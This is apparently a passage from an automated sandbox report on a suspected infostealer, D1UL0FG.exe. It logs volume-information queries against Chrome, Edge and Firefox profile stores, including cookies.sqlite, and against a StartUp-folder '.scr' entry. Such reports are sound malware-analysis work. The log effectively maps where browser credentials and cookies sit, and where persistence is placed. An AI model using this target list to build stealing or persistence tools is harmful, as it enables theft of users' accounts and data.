                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\unicodedata.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kn VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\a72670a9-643e-4e4e-b4d5-e6019a48f42a VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
